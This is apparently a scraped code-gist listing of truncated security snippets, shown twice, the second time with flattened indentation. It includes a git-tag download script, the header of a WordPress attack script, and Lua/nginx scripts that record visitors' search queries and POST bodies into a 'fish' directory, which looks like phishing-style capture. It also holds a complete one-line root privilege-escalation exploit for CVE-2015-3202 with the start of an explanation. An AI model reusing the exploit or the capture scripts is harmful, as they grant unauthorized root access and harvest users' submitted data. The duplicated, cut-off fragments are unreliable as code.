Owen Gong phith0n

## GitTag.sh
#!/bin/bash
#
# Author: Denny Huang <denny0223@gmail.com>
# Wed Sep 17 2014
# MIT License

function downloadBlob {
    echo downloadBlob $1

    mkdir -p ${1:0:2}

## wordpress.py
#!/usr/bin/env python
import requests, re, threading, time, sys, copy

def checksucc(func):
    def _func(*args, **kwargs):
        self = args[0]
        if not self.succ:
            print "[error] {info}".format(info = self.error)
            return sys.exit(0)
        else:

## admin_google_record.lua
local result = ""
local ips = red:keys("*")
for k1,ip in pairs(ips) do
	result = result .. ip .. ":\n"
	local words = red:smembers(ip)
	for k2,word in pairs(words) do
		result = result .. "\tSearch: " .. word .. "\n"
	end
end
ngx.header.content_type = 'text/plain';

## save_in_redis.lua
red = redis:new()
red:set_timeout(1000)
local ok, err = red:connect("127.0.0.1", 6379)
if not ok then
    ngx.log(ngx.WARN, "failed to connect: ", err)
    return
end
ok, err = red:select(2)
if not ok then
    ngx.log("failed to select: ", err)

## record_google_search.lua
if ngx.var.host == "xdsec.mhz.pw" then
	local args = ngx.req.get_uri_args()
	if args["q"] then
		writefile("/home/wwwroot/fish/"..ngx.var.host..".txt",  "search: " .. args["q"] .. "\n")
	end
end

## lua_fish_file_record.lua
local method=ngx.req.get_method()
if in_array(ngx.var.host, valid_host) then
if method == "POST" then
	ngx.req.read_body()
	local data = ngx.req.get_body_data()
	writefile("/home/wwwroot/fish/"..ngx.var.host..".txt", data .. "\n")
end
end

## ungzip.lua
local zlib = require "zlib"
function decode(str)
    if unexpected_condition then error() end
    local stream = zlib.inflate()
    local ret = stream(str)
    return ret
end

function callback()
    local str = ngx.arg[1]

## CVE-2015-3202
# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.

12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202

# Here's how it works, $a holds the name of a shellscript to be executed as
# root.
a=/tmp/.$$;

# $b is used twice, first to build the contents of shellscript $a, and then as
	#!/bin/bash
	#
	# Author: Denny Huang <denny0223@gmail.com>
	# Wed Sep 17 2014
	# MIT License

	function downloadBlob {
	echo downloadBlob $1

	mkdir -p ${1:0:2}
	#!/usr/bin/env python
	import requests, re, threading, time, sys, copy

	def checksucc(func):
	def _func(args, *kwargs):
	self = args[0]
	if not self.succ:
	print "[error] {info}".format(info = self.error)
	return sys.exit(0)
	else:
	local result = ""
	local ips = red:keys("*")
	for k1,ip in pairs(ips) do
	result = result .. ip .. ":\n"
	local words = red:smembers(ip)
	for k2,word in pairs(words) do
	result = result .. "\tSearch: " .. word .. "\n"
	end
	end
	ngx.header.content_type = 'text/plain';
	red = redis:new()
	red:set_timeout(1000)
	local ok, err = red:connect("127.0.0.1", 6379)
	if not ok then
	ngx.log(ngx.WARN, "failed to connect: ", err)
	return
	end
	ok, err = red:select(2)
	if not ok then
	ngx.log("failed to select: ", err)
	if ngx.var.host == "xdsec.mhz.pw" then
	local args = ngx.req.get_uri_args()
	if args["q"] then
	writefile("/home/wwwroot/fish/"..ngx.var.host..".txt", "search: " .. args["q"] .. "\n")
	end
	end
	local method=ngx.req.get_method()
	if in_array(ngx.var.host, valid_host) then
	if method == "POST" then
	ngx.req.read_body()
	local data = ngx.req.get_body_data()
	writefile("/home/wwwroot/fish/"..ngx.var.host..".txt", data .. "\n")
	end
	end
	local zlib = require "zlib"
	function decode(str)
	if unexpected_condition then error() end
	local stream = zlib.inflate()
	local ret = stream(str)
	return ret
	end

	function callback()
	local str = ngx.arg[1]
	# Making a demo exploit for CVE-2015-3202 on Ubuntu fit in a tweet.

	12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
	a=/tmp/.$$;b=chmod\ u+sx;echo $b /bin/sh>$a;$b $a;a+=\;$a;mkdir -p $a;LIBMOUNT_MTAB=/etc/$0.$0rc _FUSE_COMMFD=0 fusermount $a #CVE-2015-3202

	# Here's how it works, $a holds the name of a shellscript to be executed as
	# root.
	a=/tmp/.$$;

	# $b is used twice, first to build the contents of shellscript $a, and then as